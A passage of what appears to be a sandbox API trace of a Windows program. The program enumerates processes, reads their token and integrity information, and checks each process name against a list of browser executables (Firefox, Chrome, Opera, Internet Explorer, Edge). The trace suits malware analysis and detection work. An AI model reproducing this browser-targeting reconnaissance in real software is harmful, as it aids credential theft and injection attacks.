TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.870] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.870] CloseHandle (hObject=0xb8) returned 1 [0220.870] CloseHandle (hObject=0xb4) returned 1 [0220.870] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0220.871] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1668a8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.871] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.871] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.871] GetLastError () returned 0x7a [0220.871] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.871] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.871] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.871] CloseHandle (hObject=0xb8) returned 1 [0220.871] CloseHandle (hObject=0xb4) returned 1 [0220.874] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.874] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.874] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0220.874] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.874] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.875] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0220.875] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.875] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.875] GetLastError () returned 0x7a [0220.875] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.875] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.875] CloseHandle (hObject=0xb8) returned 1 [0220.875] CloseHandle (hObject=0xb4) returned 1 [0220.875] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0220.876] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166e60, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.876] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.876] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.876] GetLastError () returned 0x7a [0220.876] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.876] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.876] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.876] CloseHandle (hObject=0xb8) returned 1 [0220.876] CloseHandle (hObject=0xb4) returned 1 [0220.877] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0220.877] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0220.877] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0220.877] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0220.877] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0220.877] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0220.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0220.877] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.878] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.878] GetLastError () returned 0x7a [0220.878] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.878] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.878] CloseHandle (hObject=0xb8) returned 1 [0220.878] CloseHandle (hObject=0xb4) returned 1 [0220.878] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0220.878] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166fb8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.878] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.879] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.879] GetLastError () returned 0x7a [0220.879] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.879] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.879] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.879] CloseHandle (hObject=0xb8) returned 1 [0220.879] CloseHandle (hObject=0xb4) returned 1 [0220.880] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0220.880] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0220.880] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0220.880] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0220.880] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0220.880] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0220.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0220.880] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.880] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.880] GetLastError () returned 0x7a [0220.881] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.881] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.881] CloseHandle (hObject=0xb8) returned 1 [0220.881] CloseHandle (hObject=0xb4) returned 1 [0220.881] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0220.881] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167110, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.881] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.881] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.881] GetLastError () returned 0x7a [0220.882] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.882] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.882] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.882] CloseHandle (hObject=0xb8) returned 1 [0220.882] CloseHandle (hObject=0xb4) returned 1 [0220.883] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0220.883] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0220.883] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0220.883] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0220.883] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0220.883] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0220.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0220.883] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.883] GetLastError () returned 0x7a [0220.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.883] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.884] CloseHandle (hObject=0xb8) returned 1 [0220.884] CloseHandle (hObject=0xb4) returned 1 [0220.884] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0220.884] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167290, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.884] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.884] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.884] GetLastError () returned 0x7a [0220.884] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.884] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.885] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.885] CloseHandle (hObject=0xb8) returned 1 [0220.885] CloseHandle (hObject=0xb4) returned 1 [0220.885] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.885] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0220.886] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.886] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.886] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.886] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0220.886] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.886] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.886] GetLastError () returned 0x7a [0220.886] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.886] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.886] CloseHandle (hObject=0xb8) returned 1 [0220.886] CloseHandle (hObject=0xb4) returned 1 [0220.887] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0220.887] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1673f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.887] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.887] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.887] GetLastError () returned 0x7a [0220.887] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.887] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.887] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.888] CloseHandle (hObject=0xb8) returned 1 [0220.888] CloseHandle (hObject=0xb4) returned 1 [0220.888] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0220.888] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0220.888] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0220.889] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0220.889] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0220.889] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0220.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0220.889] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.889] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.889] GetLastError () returned 0x7a [0220.889] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.889] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.889] CloseHandle (hObject=0xb8) returned 1 [0220.889] CloseHandle (hObject=0xb4) returned 1 [0220.890] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0220.890] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167568, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.890] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0220.890] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0220.890] GetLastError () returned 0x7a [0220.890] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0220.890] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0220.890] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0220.890] CloseHandle (hObject=0xb8) returned 1 [0220.890] CloseHandle (hObject=0xb4) returned 1 [0220.891] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.891] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0220.891] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.891] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.891] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.891] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0220.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0220.892] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0220.892] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0220.892] GetLastError () returned 0x7a [0220.892] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0220.892] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0220.892] CloseHandle (hObject=0xb8) returned 1 [0220.892] CloseHandle (hObject=0xb4) returned 1 [0220.892] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.892] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0220.892] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1676b8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.892] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, 